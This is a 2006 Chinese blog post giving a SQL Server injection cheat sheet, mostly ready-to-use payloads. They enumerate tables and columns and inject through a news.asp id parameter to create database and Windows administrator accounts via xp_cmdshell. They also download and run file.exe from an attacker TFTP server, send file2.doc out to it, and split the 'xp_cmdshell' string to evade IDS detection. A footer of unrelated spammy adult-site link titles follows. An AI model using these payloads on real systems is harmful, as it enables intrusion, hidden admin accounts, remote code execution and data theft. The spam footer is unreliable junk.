<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    posts - 23,comments - 12,trackbacks - 0

    [獲得數據表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名]
    update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一個加一個]) [ where 條件]


    [獲得數據表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名]
    update 表名 set 字段=(select top 1 col_name(object_id('要查詢的數據表名'),字段列如:1) [ where 條件]


    也可以這樣更簡捷的獲取表名:


    select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…)

    通過SQLSERVER注入漏洞建數據庫管理員帳號和系統管理員帳號[當前帳號必須是SYSADMIN組]


    news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加數據庫用戶用戶test,密碼為test
    news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密碼,則用這句(將test的密碼改為123456)
    news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //將test加到sysadmin組,這個組的成員可執行任何操作
    news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //添加系統用戶test,密碼為test
    news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //將系統用戶test提升為管理員


    這樣,你在他的數據庫和系統內都留下了test管理員賬號了

    下面是如何從你的服器下載文件file.exe后運行它[前提是你必須將你的電腦設為TFTP服務器,將69端口打開]


    id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--


    然后運行這個文件:
    id=2; exec master.dbo.xp_cmdshell 'file.exe';--


    下載服務器的文件file2.doc到本地TFTP服務器[文件必須存在]:


    id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--


    繞過IDS的檢測[使用變量]
    declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
    declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\'

    posted on 2006-02-05 10:04 my java 閱讀(290) 評論(0)  編輯  收藏 所屬分類: sql server

    只有注冊用戶登錄后才能發表評論。


    網站導航:
     
    主站蜘蛛池模板: 亚洲第一成年免费网站| 久青草视频97国内免费影视| 国产成人精品一区二区三区免费 | 欧洲一级毛片免费| 亚洲国产老鸭窝一区二区三区| 成人妇女免费播放久久久| 亚洲美女高清一区二区三区| 四虎影视在线看免费观看| 亚洲国产精品专区在线观看| 免费一级特黄特色大片| 亚洲片国产一区一级在线观看| 人禽伦免费交视频播放| 国产亚洲精品无码拍拍拍色欲| 老司机精品免费视频| 久久亚洲一区二区| 久久不见久久见免费视频7 | 国产成人精品免费视频大| 亚洲成A∨人片在线观看无码| 4hu四虎最新免费地址| 亚洲色无码专区一区| 国产精品嫩草影院免费| 三级片免费观看久久| 伊人久久大香线蕉亚洲五月天| 很黄很污的网站免费| 亚洲成a人片在线观看精品| 曰皮全部过程视频免费国产30分钟| 亚洲av无码成人精品区一本二本| 免费人成网站在线高清| 国产人成网在线播放VA免费| 无码久久精品国产亚洲Av影片| 久久久久av无码免费网| 亚洲第一成年免费网站| 爱情岛论坛网亚洲品质自拍| 久久国产精品免费观看| 在线精品亚洲一区二区| 国产成人毛片亚洲精品| 免费观看激色视频网站(性色)| 风间由美在线亚洲一区| 亚洲成AV人在线观看天堂无码| 免费福利网站在线观看| 日亚毛片免费乱码不卡一区 |